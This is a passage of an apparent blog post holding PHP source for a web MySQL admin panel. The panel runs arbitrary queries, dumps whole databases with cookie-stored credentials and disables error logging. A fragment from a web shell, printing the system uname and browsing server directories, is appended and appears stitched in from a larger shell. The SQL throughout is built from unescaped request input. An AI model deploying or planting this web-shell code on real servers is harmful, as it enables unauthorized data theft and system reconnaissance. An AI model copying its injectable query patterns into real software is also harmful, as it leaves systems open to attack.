        $M, $D, $unsigned, $zerofill, $binary, $not_null, $default_value, $auto_increment, $primary_key, $valuelist;

    if( $cmd == "add" )
        $queryStr = "ALTER TABLE $tablename ADD $name ";
    else if( $cmd == "edit" )
        $queryStr = "ALTER TABLE $tablename CHANGE $old_name $name ";
   
    if( $M != "" )
        if( $D != "" )
            $queryStr .= "$type($M,$D) ";
        else
            $queryStr .= "$type($M) ";
    else if( $valuelist != "" ) {
        $valuelist = stripslashes( $valuelist );
        $queryStr .= "$type($valuelist) ";
    } else
        $queryStr .= "$type ";

    $queryStr .= "$unsigned $zerofill $binary ";

    if( $default_value != "" )
        $queryStr .= "DEFAULT '$default_value' ";
   
    $queryStr .= "$not_null $auto_increment";

    mysql_select_db( $dbname, $mysqlHandle );
    mysql_query( $queryStr, $mysqlHandle );
    $errMsg = mysql_error();

    // key change
    $keyChange = false;
    $result = mysql_query( "SHOW KEYS FROM $tablename" );
    $primary = "";
    while( $row = mysql_fetch_array($result) )
        if( $row["Key_name"] == "PRIMARY" ) {
            if( $row[Column_name] == $name )
                $keyChange = true;
            else
                $primary .= ", $row[Column_name]";
        }
    if( $primary_key == "PRIMARY KEY" ) {
        $primary .= ", $name";
        $keyChange = !$keyChange;
    }
    $primary = substr( $primary, 2 );
    if( $keyChange == true ) {
        $q = "ALTER TABLE $tablename DROP PRIMARY KEY";
        mysql_query( $q );
        $queryStr .= "<br>\n" . $q;
        $errMsg .= "<br>\n" . mysql_error();
        $q = "ALTER TABLE $tablename ADD PRIMARY KEY( $primary )";
        mysql_query( $q );
        $queryStr .= "<br>\n" . $q;
        $errMsg .= "<br>\n" . mysql_error();
    }

    viewSchema();
}

function dropField() {
    global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;

    $queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
    mysql_select_db( $dbname, $mysqlHandle );
    mysql_query( $queryStr , $mysqlHandle );
    $errMsg = mysql_error();

    viewSchema();
}

function viewData( $queryStr ) {
    global $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby;

    echo "<h1>Data in Table</h1>\n";
    if( $tablename != "" )
        echo "<p class=location>$dbname > $tablename</p>\n";
    else
        echo "<p class=location>$dbname</p>\n";

    $queryStr = stripslashes( $queryStr );
    if( $queryStr == "" ) {
        $queryStr = "SELECT * FROM $tablename";
        if( $orderby != "" )
            $queryStr .= " ORDER BY $orderby";
        echo "<a href='$PHP_SELF?action=addData&dbname=$dbname&tablename=$tablename'>Add Data</a> | \n";
        echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
    }

    $pResult = mysql_db_query( $dbname, $queryStr );
    $fieldt = mysql_fetch_field($pResult);
    $tablename = $fieldt->table;
    $errMsg = mysql_error();

    $GLOBALS[queryStr] = $queryStr;

    if( $pResult == false ) {
        echoQueryResult();
        return;
    }
    if( $pResult == 1 ) {
        $errMsg = "Success";
        echoQueryResult();
        return;
    }

    echo "<hr>\n";

    $row = mysql_num_rows( $pResult );
    $col = mysql_num_fields( $pResult );

    if( $row == 0 ) {
        echo "No Data Exist!";
        return;
    }
   
    if( $rowperpage == "" ) $rowperpage = 30;
    if( $page == "" ) $page = 0;
    else $page--;
    mysql_data_seek( $pResult, $page * $rowperpage );

    echo "<table cellspacing=1 cellpadding=2>\n";
    echo "<tr>\n";
    for( $i = 0; $i < $col; $i++ ) {
        $field = mysql_fetch_field( $pResult, $i );
        echo "<th>";
        if($action == "viewData")
            echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
        else
            echo "<font    style='text-decoration:none;color:#000000;font-size:x-small;'>".$field->name."</font>\n";
        echo "</th>\n";
    }
    echo "<th colspan=2>Action</th>\n";
    echo "</tr>\n";

    for( $i = 0; $i < $rowperpage; $i++ ) {
        $rowArray = mysql_fetch_row( $pResult );
        if( $rowArray == false ) break;
        echo "<tr>\n";
        $key = "";
        for( $j = 0; $j < $col; $j++ ) {
            $data = $rowArray[$j];

            $field = mysql_fetch_field( $pResult, $j );
            if( $field->primary_key == 1 )
                $key .= "&" . $field->name . "=" . $data;

            if( strlen( $data ) > 30 )
                $data = substr( $data, 0, 30 ) . "...";
            $data = htmlspecialchars( $data );
            echo "<td>\n";
            echo "$data\n";
            echo "</td>\n";
        }
        
        if( $key == "" )
            echo "<td colspan=2>no Key</td>\n";
        else {
            echo "<td><a href='$PHP_SELF?action=editData$key&dbname=$dbname&tablename=$tablename'>Edit</a></td>\n";
            echo "<td><a href='$PHP_SELF?action=deleteData$key&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Delete Row?')\">Delete</a></td>\n";
        }
        echo "</tr>\n";
    }
    echo "</table>\n";

    echo "<font size=2>\n";
    if($action == "viewData")
        echo "<form action='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename' method=post>\n";
    else
        echo "<form action='$PHP_SELF?action=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr' method=post>\n";
    echo "<font color=green>\n";
    echo ($page+1)."/".(int)($row/$rowperpage+1)." page";
    echo "</font>\n";
    echo " | ";
    if( $page > 0 ) {
        if($action == "viewData")
            echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page);
        else
            echo "<a href='$PHP_SELF?action=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr&page=".($page);
        if( $orderby != "" && $action == "viewData")
            echo "&orderby=$orderby";
        echo "'>Prev</a>\n";
    } else
        echo "Prev";
    echo " | ";
    if( $page < ($row/$rowperpage)-1 ) {
        if($action == "viewData")
            echo "<a href='$PHP_SELF?action=viewData&dbname=$dbname&tablename=$tablename&page=".($page+2);
        else
            echo "<a href='$PHP_SELF?action=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr&page=".($page+2);
        if( $orderby != "" && $action == "viewData")
            echo "&orderby=$orderby";
        echo "'>Next</a>\n";
    } else
        echo "Next";
    echo " | ";
    if( $row > $rowperpage ) {
        echo "<input type=text size=4 name=page>\n";
        echo "<input type=submit value='Go'>\n";
    }
    echo "</form>\n";
    echo "</font>\n";
}

function manageData( $cmd ) {
    global $mysqlHandle, $dbname, $tablename, $PHP_SELF;

    if( $cmd == "add" )
        echo "<h1>Add Data</h1>\n";
    else if( $cmd == "edit" ) {
        echo "<h1>Edit Data</h1>\n";
        $pResult = mysql_list_fields( $dbname, $tablename );
        $num = mysql_num_fields( $pResult );
   
        $key = "";
        for( $i = 0; $i < $num; $i++ ) {
            $field = mysql_fetch_field( $pResult, $i );
            if( $field->primary_key == 1 )
                if( $field->numeric == 1 )
                    $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
                else
                    $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
        }
        $key = substr( $key, 0, strlen($key)-4 );

        mysql_select_db( $dbname, $mysqlHandle );
        $pResult = mysql_query( $queryStr =  "SELECT * FROM $tablename WHERE $key", $mysqlHandle );
        $data = mysql_fetch_array( $pResult );
    }

    echo "<p class=location>$dbname > $tablename</p>\n";

    echo "<form action='$PHP_SELF' method=post>\n";
    if( $cmd == "add" )
        echo "<input type=hidden name=action value=addData_submit>\n";
    else if( $cmd == "edit" )
        echo "<input type=hidden name=action value=editData_submit>\n";
    echo "<input type=hidden name=dbname value=$dbname>\n";
    echo "<input type=hidden name=tablename value=$tablename>\n";
    echo "<table cellspacing=1 cellpadding=2>\n";
    echo "<tr>\n";
    echo "<th>Name</th>\n";
    echo "<th>Type</th>\n";
    echo "<th>Function</th>\n";
    echo "<th>Data</th>\n";
    echo "</tr>\n";

    $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
    $num = mysql_num_rows( $pResult );

    $pResultLen = mysql_list_fields( $dbname, $tablename );

    for( $i = 0; $i < $num; $i++ ) {
        $field = mysql_fetch_array( $pResult );
        $fieldname = $field["Field"];
        $fieldtype = $field["Type"];
        $len = mysql_field_len( $pResultLen, $i );

        echo "<tr>";
        echo "<td>$fieldname</td>";
        echo "<td>".$field["Type"]."</td>";
        echo "<td>\n";
        echo "<select name=${fieldname}_function>\n";
        echo "<option>\n";
        echo "<option>ASCII\n";
        echo "<option>CHAR\n";
        echo "<option>SOUNDEX\n";
        echo "<option>CURDATE\n";
        echo "<option>CURTIME\n";
        echo "<option>FROM_DAYS\n";
        echo "<option>FROM_UNIXTIME\n";
        echo "<option>NOW\n";
        echo "<option>PASSWORD\n";
        echo "<option>PERIOD_ADD\n";
        echo "<option>PERIOD_DIFF\n";
        echo "<option>TO_DAYS\n";
        echo "<option>USER\n";
        echo "<option>WEEKDAY\n";
        echo "<option>RAND\n";
        echo "</select>\n";
        echo "</td>\n";
        $value = htmlspecialchars($data[$i]);
        if( $cmd == "add" ) {
            $type = strtok( $fieldtype, " (,)\n" );
            if( $type == "enum" || $type == "set" ) {
                echo "<td>\n";
                if( $type == "enum" )
                    echo "<select name=$fieldname>\n";
                else if( $type == "set" )
                    echo "<select name=$fieldname size=4 multiple>\n";
                while( $str = strtok( "'" ) ) {
                    echo "<option>$str\n";
                    strtok( "'" );
                }
                echo "</select>\n";
                echo "</td>\n";
            } else {
                if( $len < 40 )
                    echo "<td><input type=text size=40 maxlength=$len name=$fieldname></td>\n";
                else
                    echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname></textarea>\n";
            }
        } else if( $cmd == "edit" ) {
            $type = strtok( $fieldtype, " (,)\n" );
            if( $type == "enum" || $type == "set" ) {
                echo "<td>\n";
                if( $type == "enum" )
                    echo "<select name=$fieldname>\n";
                else if( $type == "set" )
                    echo "<select name=$fieldname size=4 multiple>\n";
                while( $str = strtok( "'" ) ) {
                    if( $value == $str )
                        echo "<option selected>$str\n";
                    else
                        echo "<option>$str\n";
                    strtok( "'" );
                }
                echo "</select>\n";
                echo "</td>\n";
            } else {
                if( $len < 40 )
                    echo "<td><input type=text size=40 maxlength=$len name=$fieldname value=\"$value\"></td>\n";
                else
                    echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname>$value</textarea>\n";
            }
        }
        echo "</tr>";
    }
    echo "</table><p>\n";
    if( $cmd == "add" )
        echo "<input type=submit value='Add Data'>\n";
    else if( $cmd == "edit" )
        echo "<input type=submit value='Edit Data'>\n";
    echo "<input type=button value='Cancel' onClick='history.back()'>\n";
    echo "</form>\n";
}

function manageData_submit( $cmd ) {
    global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;

    $pResult = mysql_list_fields( $dbname, $tablename );
    $num = mysql_num_fields( $pResult );

    mysql_select_db( $dbname, $mysqlHandle );
    if( $cmd == "add" )
        $queryStr = "INSERT INTO $tablename VALUES (";
    else if( $cmd == "edit" )
        $queryStr = "REPLACE INTO $tablename VALUES (";
    for( $i = 0; $i < $num-1; $i++ ) {
        $field = mysql_fetch_field( $pResult );
        $func = $GLOBALS[$field->name."_function"];
        if( $func != "" )
            $queryStr .= " $func(";
        if( $field->numeric == 1 ) {
            $queryStr .= $GLOBALS[$field->name];
            if( $func != "" )
                $queryStr .= "),";
            else
                $queryStr .= ",";
        } else {
            $queryStr .= "'" . $GLOBALS[$field->name];
            if( $func != "" )
                $queryStr .= "'),";
            else
                $queryStr .= "',";
        }
    }
    $field = mysql_fetch_field( $pResult );
    if( $field->numeric == 1 )
        $queryStr .= $GLOBALS[$field->name] . ")";
    else
        $queryStr .= "'" . $GLOBALS[$field->name] . "')";

    mysql_query( $queryStr , $mysqlHandle );
    $errMsg = mysql_error();

    viewData( "" );
}

function deleteData() {
    global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;

    $pResult = mysql_list_fields( $dbname, $tablename );
    $num = mysql_num_fields( $pResult );

    $key = "";
    for( $i = 0; $i < $num; $i++ ) {
        $field = mysql_fetch_field( $pResult, $i );
        if( $field->primary_key == 1 )
            if( $field->numeric == 1 )
                $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
            else
                $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
    }
    $key = substr( $key, 0, strlen($key)-4 );

    mysql_select_db( $dbname, $mysqlHandle );
    $queryStr =  "DELETE FROM $tablename WHERE $key";
    mysql_query( $queryStr, $mysqlHandle );
    $errMsg = mysql_error();

    viewData( "" );
}

function fetch_table_dump_sql($table)
{
    global $mysqlHandle,$dbname;
   
    mysql_select_db( $dbname, $mysqlHandle );
    $query_id = mysql_query("SHOW CREATE TABLE $table",$mysqlHandle);
    $tabledump = mysql_fetch_array($query_id, MYSQL_ASSOC);
    $tabledump = "DROP TABLE IF EXISTS $table;\n" . $tabledump['Create Table'] . ";\n\n";

    echo $tabledump;

    // get data
    $rows = mysql_query("SELECT * FROM $table",$mysqlHandle);
    $numfields=mysql_num_fields($rows);
    while ($row = mysql_fetch_array($rows, MYSQL_NUM))
    {
        $tabledump = "INSERT INTO $table VALUES(";

        $fieldcounter = -1;
        $firstfield = 1;
        // get each field's data
        while (++$fieldcounter < $numfields)
        {
            if (!$firstfield)
            {
                $tabledump .= ', ';
            }
            else
            {
                $firstfield = 0;
            }

            if (!isset($row["$fieldcounter"]))
            {
                $tabledump .= 'NULL';
            }
            else
            {
                $tabledump .= "'" . mysql_escape_string($row["$fieldcounter"]) . "'";
            }
        }

        $tabledump .= ");\n";

        echo $tabledump;

    }
    @mysql_free_result($rows);
}

function dump() {
    global $mysqlHandle, $action, $dbname, $tablename;

    if( $action == "dumpTable" ){

        header("Content-disposition: filename=$tablename.sql");
        header('Content-type: unknown/unknown');
        fetch_table_dump_sql($tablename);
        echo "\n\n\n";
        echo "\r\n\r\n\r\n### $tablename TABLE DUMP COMPLETED ###";
        exit;       
               
    }else{
        header("Content-disposition: filename=$dbname.sql");
        header('Content-type: unknown/unknown');
       
        mysql_select_db( $dbname, $mysqlHandle );
        $query_id = mysql_query("SHOW tables",$mysqlHandle);
        while ($row = mysql_fetch_array($query_id, MYSQL_NUM))
        {
                fetch_table_dump_sql($row[0]);
                echo "\n\n\n";
                echo "\r\n\r\n\r\n### $row[0] TABLE DUMP COMPLETED ###";
                echo "\n\n\n";
        }
        echo "\r\n\r\n\r\n### $dbname DATABASE DUMP COMPLETED ###";
        exit;       

    }

}

function utils() {
    global $PHP_SELF, $command;
    echo "<h1>Utilities</h1>\n";
    if( $command == "" || substr( $command, 0, 5 ) == "flush" ) {
        echo "<hr>\n";
        echo "Show\n";
        echo "<ul>\n";
        echo "<li><a href='$PHP_SELF?action=utils&command=show_status'>Status</a>\n";
        echo "<li><a href='$PHP_SELF?action=utils&command=show_variables'>Variables</a>\n";
        echo "<li><a href='$PHP_SELF?action=utils&command=show_processlist'>Processlist</a>\n";
        echo "</ul>\n";
        echo "Flush\n";
        echo "<ul>\n";
        echo "<li><a href='$PHP_SELF?action=utils&command=flush_hosts'>Hosts</a>\n";
        if( $command == "flush_hosts" ) {
            if( mysql_query( "Flush hosts" ) != false )
                echo "<font size=2 color=red>- Success</font>";
            else
                echo "<font size=2 color=red>- Fail</font>";
        }
        echo "<li><a href='$PHP_SELF?action=utils&command=flush_logs'>Logs</a>\n";
        if( $command == "flush_logs" ) {
            if( mysql_query( "Flush logs" ) != false )
                echo "<font size=2 color=red>- Success</font>";
            else
                echo "<font size=2 color=red>- Fail</font>";
        }
        echo "<li><a href='$PHP_SELF?action=utils&command=flush_privileges'>Privileges</a>\n";
        if( $command == "flush_privileges" ) {
            if( mysql_query( "Flush privileges" ) != false )
                echo "<font size=2 color=red>- Success</font>";
            else
                echo "<font size=2 color=red>- Fail</font>";
        }
        echo "<li><a href='$PHP_SELF?action=utils&command=flush_tables'>Tables</a>\n";
        if( $command == "flush_tables" ) {
            if( mysql_query( "Flush tables" ) != false )
                echo "<font size=2 color=red>- Success</font>";
            else
                echo "<font size=2 color=red>- Fail</font>";
        }
        echo "<li><a href='$PHP_SELF?action=utils&command=flush_status'>Status</a>\n";
        if( $command == "flush_status" ) {
            if( mysql_query( "Flush status" ) != false )
                echo "<font size=2 color=red>- Success</font>";
            else
                echo "<font size=2 color=red>- Fail</font>";
        }
        echo "</ul>\n";
    } else {
        $queryStr = ereg_replace( "_", " ", $command );
        $pResult = mysql_query( $queryStr );
        if( $pResult == false ) {
            echo "Fail";
            return;
        }
        $col = mysql_num_fields( $pResult );

        echo "<p class=location>$queryStr</p>\n";
        echo "<hr>\n";

        echo "<table cellspacing=1 cellpadding=2 border=0>\n";
        echo "<tr>\n";
        for( $i = 0; $i < $col; $i++ ) {
            $field = mysql_fetch_field( $pResult, $i );
            echo "<th>".$field->name."</th>\n";
        }
        echo "</tr>\n";

        while( 1 ) {
            $rowArray = mysql_fetch_row( $pResult );
            if( $rowArray == false ) break;
            echo "<tr>\n";
            for( $j = 0; $j < $col; $j++ )
                echo "<td>".htmlspecialchars( $rowArray[$j] )."</td>\n";
            echo "</tr>\n";
        }
        echo "</table>\n";
    }
}

function header_html() {
    global $PHP_SELF;
   
echo '
<html>
<head>
<title>MySQL Interface</title>
<style type="text/css">
<!--
p.location {
    color: #11bb33;
    font-size: small;
}
h1 {
    color: #A4A260;
}
th {
    background-color: #BDBE42;
    color: #FFFFFF;
    font-size: x-small;
}
td {
    background-color: #DEDFA5;
    font-size: x-small;
}
form {
    margin-top: 0;
    margin-bottom: 0;
}
a {
    text-decoration:none;
    color: #848200;
    font-size:x-small;
}
a:link {
}
a:hover {
    background-color:#EEEFD5;
    color:#646200;
    text-decoration:none              
}
//-->
</style>
</head>
<body>
';
}

function footer_html() {
    global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $USERNAME;

    echo "<hr>\n";
    echo "<font size=2 color=blue>[$USERNAME]</font> - \n";

    echo "<a href='$PHP_SELF?action=listDBs'>Database List</a> | \n";
    if( $tablename != "" )
        echo "<a href='$PHP_SELF?action=listTables&dbname=$dbname&tablename=$tablename'>Table List</a> | ";
    echo "<a href='$PHP_SELF?action=utils'>Utils</a> |\n";
    echo "<a href='$PHP_SELF?action=logout'>Logout</a>\n";
    echo "</font>\n";
    echo "</body>\n";
    echo "</html>\n";
}




//------------- MAIN ------------- //
error_reporting(0);
ini_set ('display_errors', 0);
ini_set ('log_errors', 0);

if( $action == "logon" || $action == "" || $action == "logout" )
    logon();
else if( $action == "logon_submit" )
    logon_submit();
else if( $action == "dumpTable" || $action == "dumpDB" ) {
    while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
        if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
        if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
        if( $var == "mysql_web_admin_hostname" ) $HOSTNAME = $value;
    }
    $mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
    dump();
} else {
    while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
        if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
        if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
        if( $var == "mysql_web_admin_hostname" ) $HOSTNAME = $value;
    }
    echo "<!--";
    $mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
    echo "-->";

    if( $mysqlHandle == false ) {
        echo "<html>\n";
        echo "<head>\n";
        echo "<title>MySQL Interface</title>\n";
        echo "</head>\n";
        echo "<body>\n";
        echo "<table width=100% height=100%><tr><td><center>\n";
        echo "<h1>Wrong Password!</h1>\n";
        echo "<a href='$PHP_SELF?action=logon'>Logon</a>\n";
        echo "</center></td></tr></table>\n";
        echo "</body>\n";
        echo "</html>\n";
    } else {
        header_html();
        if( $action == "listDBs" )
            listDatabases();
        else if( $action == "createDB" )
            createDatabase();
        else if( $action == "dropDB" )
            dropDatabase();
        else if( $action == "listTables" )
            listTables();
        else if( $action == "createTable" )
            createTable();
        else if( $action == "dropTable" )
            dropTable();
        else if( $action == "viewSchema" )
            viewSchema();
        else if( $action == "query" )
            viewData( $queryStr );
        else if( $action == "addField" )
            manageField( "add" );
        else if( $action == "addField_submit" )
            manageField_submit( "add" );
        else if( $action == "editField" )
            manageField( "edit" );
        else if( $action == "editField_submit" )
            manageField_submit( "edit" );
        else if( $action == "dropField" )
            dropField();
        else if( $action == "viewData" )
            viewData( "" );
        else if( $action == "addData" )
            manageData( "add" );
        else if( $action == "addData_submit" )
            manageData_submit( "add" );
        else if( $action == "editData" )
            manageData( "edit" );
        else if( $action == "editData_submit" )
            manageData_submit( "edit" );
        else if( $action == "deleteData" )
            deleteData();
        else if( $action == "utils" )
            utils();

        mysql_close( $mysqlHandle);
        footer_html();
    }
}
?>
<p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p>
<?php
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
$d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
$d = str_replace("\\\\","\\",$d);
$dispd = htmlspecialchars($d);
$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1));
$i = 0;
foreach($pd as $b)
{
 $t = "";
 $j = 0;
 foreach ($e as $r)
 {
  $t.= $r.DIRECTORY_SEPARATOR;
  if ($j == $i) {break;}
  $j++;
 }
 echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>";
 $i++;
}
echo "&nbsp;&nbsp;&nbsp;";
if (is_writable($d))
{
 $wd = TRUE;
 $wdt = "<font color=green>[ ok ]</font>";
 echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>";
}
?>

Posted by Unknown at 17:33 0 comments

Labels: , , , , ,

Subscribe to: Posts (Atom)